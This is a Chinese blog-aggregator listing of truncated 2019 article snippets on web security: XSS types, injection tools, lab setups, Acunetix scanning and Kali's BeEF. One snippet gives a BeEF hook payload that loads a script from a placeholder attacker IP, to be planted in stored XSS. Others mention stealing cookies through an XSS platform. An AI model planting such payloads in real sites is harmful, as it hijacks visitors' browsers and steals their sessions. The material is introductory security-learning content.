原文链接:https://www.jianshu.com/p/a5ff8a23b423 原文作者简书:大颓宝宝 一、XSS 【Cross Site Script】跨站脚本攻击 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到 ...
分类:
Web程序 时间:
2019-06-16 23:18:51
阅读次数:
329
《密码安全新技术》课程总结报告 课程学习内容总结 "第一次课 网络(Web)安全与内容安全" 本次讲座的学习内容主要为两方面: 1.Web应用安全 SQL注入 Havij Pangolin 1. 反射型XSS 2. 存储型XSS Apache解析漏洞 Nginx解析漏洞 2.隐私安全 用户轨迹 :移 ...
分类:
其他好文 时间:
2019-06-16 22:08:04
阅读次数:
162
虚拟机栈 1、虚拟机栈维护一个线程中所有方法的栈帧,每个栈帧中保存着这个方法中用到的局部变量表,操作数栈,常量引用 2、可以用-Xss来设置每个线程中虚拟机栈的大小,在jdk1.4之前默认虚拟机栈大小是256K,在jdk1.5+默认虚拟机栈大小是1M 3、该区域可能抛出的异常 当线程请求的栈深度超过 ...
分类:
其他好文 时间:
2019-06-15 13:48:31
阅读次数:
76
原文:https://www.cnblogs.com/zhiying/p/11018331.html 前端安全-常见的攻击以及防御 一、基础知识 1、XSS(Cross Site Scripting)跨站脚本攻击 (1)原理:页面渲染的数据中包含可运行的脚本 (2)攻击的基本类型:反射型(url参数 ...
分类:
其他好文 时间:
2019-06-14 12:29:49
阅读次数:
91
漏洞环境搭建 DVWA、XSS、sqli-labs
Acunetix 扫描配置 Full Scan– 使用Full Scan来发起一个扫描的话,Acunetix会检查所有可能得安全漏洞。 High Rish Vulnerabilities–这个扫描选项将仅仅只会检查那些对web站点影响最大的缺陷漏洞。 Cross-Site Scripting(XSS ...
分类:
Web程序 时间:
2019-06-10 09:19:10
阅读次数:
136
KALI中启动BEEFXSS PAYLOAD为 <script src=”http://攻击机IP:3000/hook.js”></script> 将攻击代码插入到存储型XSS中 受害者访问存储型XSS界面,可以看到受害者不停地与攻击机进行通信 可以执行非常多的功能 2.BruteXSS 地址: h ...
分类:
其他好文 时间:
2019-06-09 00:20:07
阅读次数:
288
Kali中Beef的安装和使用: 先打开终端输入 然后切换到beef的安装目录 然后启动beef ...
分类:
其他好文 时间:
2019-06-07 23:20:24
阅读次数:
255
0X01利用平台payload获取COOKIE 本机IP 192.168.1.100 靶机win7 192.168.1.102 我们先创建一个cookie的项目 然后在可以执行xss的地方插入我们的恶意代码 可以看见成功回显 0X02基础认证钓鱼 ...
分类:
其他好文 时间:
2019-06-06 19:08:12
阅读次数:
97
0x01 安装环境 Phantomjs 下载:http://phantomjs.org/download.html 下载后配置环境变量,把bin目录下的这个exe加入环境变量 xssValidator下载安装 https://github.com/nVisium/xssValidator下载xss. ...
分类:
其他好文 时间:
2019-06-01 23:04:32
阅读次数:
477
